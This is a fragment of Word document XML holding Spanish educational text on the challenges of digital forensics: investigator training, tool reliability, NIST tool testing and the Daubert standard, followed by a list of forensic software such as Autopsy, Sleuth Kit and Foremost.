    <w:p w14:paraId="3C834B7A" w14:textId="77777777" w:rsidR="00AB038E" w:rsidRPr="00AB038E" w:rsidRDefault="00AB038E" w:rsidP="00AB038E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB038E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Al estar en un escenario que evoluciona constantemente, cada vez surgen más retos y riesgos en el área de la informática forense. Entre ellos la formación de informáticos forenses, la confiabilidad de las herramientas, la facilidad de la destrucción de las evidencias, las amenazas estratégicas y tácticas que plantea el ciberterrorismo; y las tecnologías emergentes como la nube, las tecnologías móviles, y las redes sociales. Algunos de estos temas se abordarán a continuación:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DDCAD8" w14:textId="5EB56F0E" w:rsidR="00AB038E" w:rsidRPr="00AB038E" w:rsidRDefault="00D54AC2" w:rsidP="00AB038E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB038E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Formación de informáticos forenses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF8C4FB" w14:textId="77777777" w:rsidR="00AB038E" w:rsidRPr="00AB038E" w:rsidRDefault="00AB038E" w:rsidP="00AB038E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB038E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Los criminales informáticos son una nueva generación de delincuentes, en este contexto, es necesario desarrollar un nuevo tipo de investigadores: los informáticos forenses. En este momento es un desafío encontrar personas que tengan este perfil, ya que no existen suficientes programas que realicen este tipo de formación. Adicionalmente, en este momento, la mayoría de las personas ignoran la importancia de los informáticos forenses porque no son conscientes de la dimensión del cibercrimen. Usualmente se cree que no es algo tan grave y se le da mayor importancia a otro tipo de crímenes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A474291" w14:textId="5F00129F" w:rsidR="00AB038E" w:rsidRPr="00AB038E" w:rsidRDefault="00AB038E" w:rsidP="00AB038E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB038E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Por lo tanto, se deben plantear programas e iniciativas para poder realizar esta formación. Según investigaciones e iniciativas ya realizadas, hay cuatro componentes principales que deben estar presentes en un programa de computación forense o </w:t>
      </w:r>
      <w:r w:rsidR="005F4CA6" w:rsidRPr="00AB038E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>forense</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB038E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> digital: contenido multidisciplinario, ejercicios prácticos, profesores de calidad y ejemplos del mundo real (investigación de Taylor Endicott-Popovsky y Phillips, 2007).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004A5E30" w14:textId="52D09507" w:rsidR="00AB038E" w:rsidRPr="00AB038E" w:rsidRDefault="00AB038E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB038E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Contenido multidisciplinario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400BFE07" w14:textId="7E18070F" w:rsidR="00AB038E" w:rsidRPr="00AB038E" w:rsidRDefault="00AB038E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB038E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Técnico en informática, conocimiento de criminalística, seguridad y delitos informáticos, entre otros.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271D1AED" w14:textId="6AE3A124" w:rsidR="00AB038E" w:rsidRPr="00AB038E" w:rsidRDefault="00AB038E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB038E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ejercicios prácticos en el laboratorio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229EC9CB" w14:textId="41B3A920" w:rsidR="00AB038E" w:rsidRPr="00AB038E" w:rsidRDefault="00AB038E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB038E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Con herramientas tecnológicas forenses, en diferentes niveles de dificultad y variedad de componentes a analizar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B04677" w14:textId="7EFF603F" w:rsidR="00AB038E" w:rsidRPr="00AB038E" w:rsidRDefault="00AB038E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB038E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Profesores calificados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458C1547" w14:textId="6D66C3E7" w:rsidR="00AB038E" w:rsidRPr="00AB038E" w:rsidRDefault="00AB038E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB038E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Con alto conocimiento en el tema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A191AAA" w14:textId="06F8025B" w:rsidR="00AB038E" w:rsidRPr="00AB038E" w:rsidRDefault="00AB038E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB038E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ejemplos del mundo real.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2020A561" w14:textId="50918688" w:rsidR="00AB038E" w:rsidRPr="00AB038E" w:rsidRDefault="00AB038E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB038E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Con el fin de dar mayor profundidad al aprendizaje.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7152CA04" w14:textId="26052987" w:rsidR="00AB038E" w:rsidRPr="00AB038E" w:rsidRDefault="00D54AC2" w:rsidP="00AB038E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB038E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Confiabilidad de las herramientas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400C6F17" w14:textId="77777777" w:rsidR="00AB038E" w:rsidRPr="00AB038E" w:rsidRDefault="00AB038E" w:rsidP="00AB038E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB038E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Las herramientas existentes disponibles para el cómputo forense presentan otro reto. Las herramientas licenciadas exigen a los investigadores inversiones altas (tanto en hardware, como en software), al adquirirlas y para mantenerlas. Adicionalmente, como las herramientas están avanzando constantemente requieren técnicos y usuarios que estén constantemente aprendiendo las actualizaciones, las modificaciones y los posibles errores. Por otro lado, las herramientas de código abierto son cuestionadas en muchos tribunales por su confiabilidad. Por lo tanto, no se recomiendan a la hora de usarse en una audiencia.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546A1FFD" w14:textId="7AECE83D" w:rsidR="000D10AB" w:rsidRDefault="00AB038E" w:rsidP="00AB038E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB038E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Es por esto </w:t>
      </w:r>
      <w:r w:rsidR="00542C58" w:rsidRPr="00AB038E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>por lo que</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB038E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> el </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2834">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NIST</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="009B2834">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="009B2834">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="009B2834">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>NIST: Instituto Nacional de Estándares y Tecnología, agencia del Departamento de Comercio de EE.UU. que desarrolla estándares tecnológicos."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="009B2834">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="009B2834">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009B2834">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2834">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>National Institute of Standards and Technology</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2834">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de Estados Unidos) ha planteado importantes investigaciones para probar y poner reglas para las herramientas del cómputo forense, en su proyecto NIST </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2834">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Computer </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB5F26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Forensic Tool Testing Program</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB038E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Las pruebas realizadas serán útiles para cumplir las exigencias </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB038E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>del test de Daubert standard, prueba que establece la confiabilidad de las herramientas en computación forense.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4393BB5C" w14:textId="0C6FAB49" w:rsidR="000D10AB" w:rsidRPr="00DB5F26" w:rsidRDefault="00D54AC2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB5F26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Herramientas de análisis forense.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D47E2E9" w14:textId="7B9F4B60" w:rsidR="000D10AB" w:rsidRDefault="00487731">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Se presenta una </w:t>
      </w:r>
      <w:r w:rsidR="00DB5F26" w:rsidRPr="00DB5F26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lista de herramientas útiles para la labor del investigador.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6CDA0E" w14:textId="40F7E62D" w:rsidR="00DB5F26" w:rsidRPr="00DB5F26" w:rsidRDefault="00DB5F26">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB5F26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Air (</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB5F26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Forensics Imaging</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB5F26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> GUI).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF61E2F" w14:textId="27FB58E7" w:rsidR="00DB5F26" w:rsidRPr="00DB5F26" w:rsidRDefault="00DB5F26">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB5F26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Autopsy</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Autopsy: Herramienta de análisis forense digital de código abierto.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00DB5F26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Forensics Browser for Sleuth Kit) Cryptcat (Command </w:t>
      </w:r>
      <w:r w:rsidR="005F4CA6" w:rsidRPr="00DB5F26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Line) Deep</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB5F26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Freeze.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6C49CB" w14:textId="1347726D" w:rsidR="00DB5F26" w:rsidRPr="00DB5F26" w:rsidRDefault="00DB5F26">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB5F26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Dumpzilla (Forensics Browser: Firefox, Iceweasel and Seamonkey).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B81821" w14:textId="6FE895BD" w:rsidR="00DB5F26" w:rsidRPr="00DB5F26" w:rsidRDefault="005E7F53">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>FOCA (</w:t>
      </w:r>
      <w:r w:rsidRPr="005E7F53">
        <w:t>Fingerprinting Organizations with Collected Archives)</w:t>
      </w:r>
      <w:r w:rsidR="00DB5F26" w:rsidRPr="00DB5F26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393F7945" w14:textId="33F15AE9" w:rsidR="00DB5F26" w:rsidRPr="00DB5F26" w:rsidRDefault="00DB5F26">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB5F26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Foremost (Data Carver command line tool).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B0B76C" w14:textId="652BD006" w:rsidR="00DB5F26" w:rsidRPr="00DB5F26" w:rsidRDefault="00DB5F26">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB5F26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Hetman software</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB5F26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Recuperador de datos borrados por los criminales).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787065FE" w14:textId="74EA6413" w:rsidR="00DB5F26" w:rsidRPr="00DB5F26" w:rsidRDefault="00DB5F26">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB5F26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>NTFS-Tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B05AAC7" w14:textId="64D4149C" w:rsidR="00DB5F26" w:rsidRPr="00DB5F26" w:rsidRDefault="00DB5F26">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB5F26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Netcat (Command Line).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73753E2D" w14:textId="7B92D99F" w:rsidR="00DB5F26" w:rsidRPr="00DB5F26" w:rsidRDefault="00DB5F26">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB5F26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Net resident.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AC65B2" w14:textId="7C192904" w:rsidR="00DB5F26" w:rsidRPr="00DB5F26" w:rsidRDefault="00DB5F26">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB5F26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Py-Flag (Forensics Browser).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5B7651" w14:textId="5816DF9F" w:rsidR="00DB5F26" w:rsidRPr="00DB5F26" w:rsidRDefault="00DB5F26">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB5F26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Regviewer (Windows Registry).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D6E694" w14:textId="425ED6A0" w:rsidR="00DB5F26" w:rsidRPr="00DB5F26" w:rsidRDefault="00DB5F26">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB5F26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Sleuth Kit (Forensics Kit. Command Line): </w:t>
      </w:r>
      <w:hyperlink r:id="rId101" w:history="1">
        <w:r w:rsidRPr="00DB5F26">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:cs="Arial"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://www.sleuthkit.org/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DB5F26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AC5EC0" w14:textId="55A0F984" w:rsidR="00DB5F26" w:rsidRPr="00DB5F26" w:rsidRDefault="00DB5F26">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB5F26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Viewer.</w:t>
      </w:r>
    </w:p>
